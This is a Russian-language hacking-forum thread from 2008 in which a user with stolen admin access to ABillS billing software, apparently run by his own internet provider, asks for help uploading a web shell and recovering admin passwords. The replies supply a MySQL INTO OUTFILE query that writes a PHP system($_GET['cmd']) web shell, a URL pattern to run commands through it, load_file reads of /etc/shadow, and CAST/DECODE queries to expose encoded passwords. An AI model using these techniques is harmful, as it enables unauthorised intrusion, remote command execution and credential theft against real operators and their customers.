нужна помощь(abbills)

Discussion in 'Уязвимости' started by samarin, 31 May 2008.

  1. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Может для когото вопросы покажутся и "детскими", но все-же:
    Нарыл акк админа, очень бы хотелось залить шелл.В системе присутствует sql commander. Но или я тупой :mad: или коммандер какой-то не такой :confused:(скорее всего первое :( )
    сайт разработчкика
    Делаю запрос например на вывод других админов в системе
    Code:
    select user,password from admins
    в ответ выплевывает
    Как вывести на нормальном языке?
    Проблема прядли с кодировками, т.к информация (имена пользователей, включая другую информацию)не считая паролей, выводятся в читабельном виде.
    По поводу шела into outfile как и load не получается использовать (выскакивает ошибка error select tables from blabla).
    -------------------------------
    какие есть варианты?
     
    #1 samarin, 31 May 2008
    Last edited: 31 May 2008
  2. bakl

    bakl New Member

    Joined:
    29 May 2008
    Messages:
    10
    Likes Received:
    4
    Reputations:
    0
    ну с этим возни больше будет, а вот что с шеллом не получается? напиши конкретно какой запрос делаешь и какую ошибку выкидывает, ну вообщем поподробнее опиши свои действия.
     
    1 person likes this.
  3. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    система работает на базе ".cgi"
    user:abills@localhost
    database:abills
    version:5.0.51a-log

    information_schema выводит
    ----------------------------------------
    SELECT load_file('/etc/hosts') результат Ok
    Но вывода файла нет =(
    select load_file('/etc/shadow') ok
    на права не ругается, значит доступ есть, но опять таки вывода файла нет.
    ---------------------------------------
    Дальше колупать(не зная) стремно, как никак мой пров ))
    ---------------------------------------
    Может кто подскажет как быть с выводом? или может с заливкой шелла?
     
  4. bakl

    bakl New Member

    Joined:
    29 May 2008
    Messages:
    10
    Likes Received:
    4
    Reputations:
    0
    так что те мешает найти папку для записи и потом выполнить запрос
    select '<?php system($_GET["cmd"]); ?>' from mysql.user into outfile 'C:\www...ну вообщем путь до папки для записи (например С\www\tmp\) \ shell.php'

    ну и потом просто http:\\путь до файла\shell.php?cmd=команда(например dir)


    p.s. исправил вчера забыл дописать from xd
     
    #4 bakl, 1 Jun 2008
    Last edited: 2 Jun 2008
  5. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    похожая проблема с выводом паролей

    __https://forum.antichat.ru/thread71538.html
     
  6. mister

    mister Elder - Старейшина

    Joined:
    24 Jul 2007
    Messages:
    30
    Likes Received:
    16
    Reputations:
    4
    может хеш такой?
     
  7. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    попробуй вот так
    select user,cast(password as binary) from admins
     
  8. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    мешает по идее фильтр. Даже при кодировке 0х+hex вылазит одна и таже ошибка

    [3] ERROR_SQL /select `
    или [3] ERROR_SQL/select (сам запрос)
     
  9. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    Я с этим sql commanderом не встречался, но ситуация была похожая. Когда ты делаешь select '<?php system($_GET["cmd"]); ?>' from mysql.user into outfile 'C:\www... , уверен, что количество столбцов в первом и втором selecte совпадает?

    Пробовал вот так
    select 1,2,'<?php system($_GET["cmd"]); ?>',4 from mysql.user into outfile 'C:\www... ?
     
  10. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Все кто отвечал так и не смотрели исходники :(. Сам вот добрался немного посмотрел(хоть сильно в этом и не разбираюсь)
    так вот пароли выводятся криво из за функции encode
    как составить запрос для правильного вывода? Как я понял нужно использовать decode. А по поводу встроенного в систему sql commander-a может кто-то все таки не поленится и попробует систему в действии чтобы дать дельный совет по поводу шелла? буду признателен
     
  11. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    Наоборот, просто прав нету)
     
    _________________________
  12. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    функция обратная ENCODE это DECODE
    Code:
     decode('abills', 'test12345678901234567890')
    ну или как там у тебя запрос составишь..